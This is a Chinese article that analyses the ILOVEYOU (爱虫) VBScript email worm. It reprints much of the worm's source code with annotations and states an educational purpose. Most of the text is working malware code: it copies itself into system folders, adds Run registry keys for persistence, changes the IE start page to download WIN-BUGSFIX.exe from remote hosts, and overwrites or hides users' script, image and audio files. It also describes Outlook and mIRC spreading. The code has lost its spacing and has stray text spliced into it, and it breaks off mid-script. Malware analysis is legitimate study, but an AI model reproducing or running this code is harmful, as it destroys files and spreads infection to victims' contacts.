“爱虫(I-Loveyou)”病毒代码解析和杀毒方法

“爱虫(ILoveyou)”病毒代码解析和杀毒方法中国代码联盟黄冬李文武近来在网上出现了“我爱你”病毒，让人们恐慌一时，而它在国内却没有出现什么问题，到现在我也没有听到有哪位计算机使用者说自己被爱到至死。究其原因是什么？而“我爱你”病毒到底是什么？难道说是我国的计算机防毒水平和计算机杀毒软件的水平已经到了世界领先的水平？我们来细细看看它的原因就明白其中的道理了。另：笔者写本文完全是为了学术作用，请不要将此病毒代码用于破坏之目的。首先让我们来看一看我爱你病毒的来源。有一天你会收到一封邮件，它的主题是“ILoveYou”（如果细细读读它的程序，这个主题其实可以并不是ILoveYou），在它的信中带有了一个叫“iloveyou.vbs”的附件，而这个附件将是病毒的根源。下面这段是“我爱你”病毒的所有的源代码，其中加入了我的注释（大多数的vbs的语法大家可以到wsh中去查、我在函数调用的地方写明了这些函数的说明，具体实现可以到函数体中去找）：Rem=======================================================================Rem本文件为病毒样本，供学习之用，原文件中扫描文件进行感染部分被我注释掉了Rem请勿将本文件用作破坏之目的。white(@yeah.net)hd(hd@email.com.cn)Rem=======================================================================OnErrorResumeNextdimfso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,doweq=ctr=0Setfso=CreateObject(Scripting.FileSystemObject)setfile=fso.OpenTextFile(WScript.ScriptFullname,1)vbscopy=file.ReadAllmain()submain()OnErrorResumeNextdimwscr,rrsetwscr=CreateObject(WScript.Shell)rr=wscr.RegRead(HKEY_CURRENT_USER\Software\Microsoft\WindowsScriptingHost\Settings\Timeout)if(rr=1)thenwscr.RegWriteHKEY_CURRENT_USER\Software\Microsoft\WindowsScriptingHost\Settings\Timeout,0,REG_DWORDendifSetdirwin=fso.GetSpecialFolder(0)Setdirsystem=fso.GetSpecialFolder(1)Setdirtemp=fso.GetSpecialFolder(2)Setc=fso.GetFile(WScript.ScriptFullName)c.Copy(dirsystem&\MSKernel32.vbs)c.Copy(dirwin&\Win32DLL.vbs)c.Copy(dirsystem&\LOVE-LETTER-FOR-YOU.TXT.vbs)'上面三句将自身复制成三个文件regruns()'如果系统为win98，设IE的起始页为四个URL之一，以下载一个叫WIN-BUGSFIX.exe的文件，'并将其设为系统启动时自动执行的程序，看起来好象是一个补丁程序html()'为OUTLOOK用户生成一个含病毒代码的HTML文件LOVE-LETTER-FOR-YOU.HTM，'该HTML文件里包含一段JAVASCRIPT，打开时脚本被执行，病毒体被写入文件MSKernel32.vbs,同时被设成'系统启动时自动执行spreadtoemail()'为OUTLOOK里的所有联系人发一封包含上面那个文件的邮件listadriv()'扫描整个磁盘，将后缀为.vbs,..vbe的文件换成自身，将后缀为.js,.jse,.css,.wsh,.sct,.hta,'的文件改后缀为vbs并写入自身，同时删除原有文件，将后缀为.jpg,.jpeg的在文件名后加.vbs后，写入'自身，将后缀为.mp3,mp2的文件名后加.vbs并写入自身，同时将文件属性改为隐藏文件，'如果发现有mIRC,将改写script.ini，使得mIRC向所有频道里的人发送刚才的html文件。endsubsubregruns()OnErrorResumeNextDimnum,downreadregcreateHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern册表中的加载项一些软件可以写入到这里后实现开机运行el32,dirsystem&\MSKernel32.vbsregcreateHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService册表中的加载项一些软件可以写入到这里后实现开机运行s\Win32DLL,dirwin&\Win32DLL.vbsdownread=downread=regget(HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\DownloadDirectory)if(downread=)thendownread=c:\endifif(fileexist(dirsystem&\WinFAT32.exe)=1)thenRandomizenum=Int((4*Rnd)+1)ifnum=1thenregcreateHKCU\Software\Microsoft\InternetExplorer\Main\StartPage,~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exeelseifnum=2thenregcreateHKCU\Software\Microsoft\InternetExplorer\Main\StartPage,~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exeelseifnum=3thenregcreateHKCU\Software\Microsoft\InternetExplorer\Main\StartPage,~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exeelseifnum=4thenregcreateHKCU\Software\Microsoft\InternetExplorer\Main\StartPage,~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exeendifendifif(fileexist(downread&\WIN-BUGSFIX.exe)=0)thenregcreateHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU注册表中的加载项一些软件可以写入到这里后实现开机运行GSFIX,downread&\WIN-BUGSFIX.exeregcreateHKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\StartPage,about:blankendifendsubsublistadrivOnErrorResumeNextDimd,dc,sSetdc=fso.DrivesForEachdindcIfd.DriveType=2ord.DriveType=3Thenfolderlist(d.path&\)endifNextlistadriv=sendsubsubinfectfiles(folderspec)OnErrorResumeNextdimf,f1,fc,ext,ap,mircfname,s,bname,mp3setf=fso.GetFolder(folderspec)setfc=f.Filesforeachf1infcext=fso.GetExtensionName(f1.path)ext=lcase(ext)s=lcase(f1.name)if(ext=vbs)or(ext=vbe)thensetap=fso.OpenTextFile(f1.path,2,true)ap.writevbscopyap.closeelseif(ext=js)or(ext=jse)or(ext=css)or(ext=wsh)or(ext=sct)or(ext=hta)thensetap=fso.OpenTextFile(f1.path,2,true)ap.writevbscopyap.closebname=fso.GetBaseName(f1.path)setcop=fso.GetFile(f1.path)cop.copy(folderspec&\&bname&.vbs)fso.DeleteFile(f1.path)elseif(ext=jpg)or(ext=jpeg)thensetap=fso.OpenTextFile(f1.path,2,true)ap.writevbscopyap.closesetcop=fso.GetFile(f1.path)cop.copy(f1.path&.vbs)fso.DeleteFile(f1.path)elseif(ext=mp3)or(ext=mp2)thensetmp3=fso.CreateTextFile(f1.path&.vbs)mp3.writevbscopymp3.closesetatt=fso.GetFile(f1.path)att.attributes=att.attributes+2endifif(eqfolderspec)thenif(s=mirc32.exe)or(s=mlink32.exe)or(s=mirc.ini)or(s=script.ini)or(s=mirc.hlp)thensetscriptini=fso.CreateTextFile(folderspec&\script.ini)scriptini.WriteLine[script]scriptini.WriteLine;mIRCScriptscriptini.WriteLine;Pleasedonteditthisscript...mIRCwillcorrupt,ifmIRCwillscriptini.WriteLinecorrupt...WINDOWSwillaffectandwillnotruncorrectly.thanksscriptini.WriteLine;scriptini.WriteLine;KhaledMardam-Beyscriptini.WriteLine;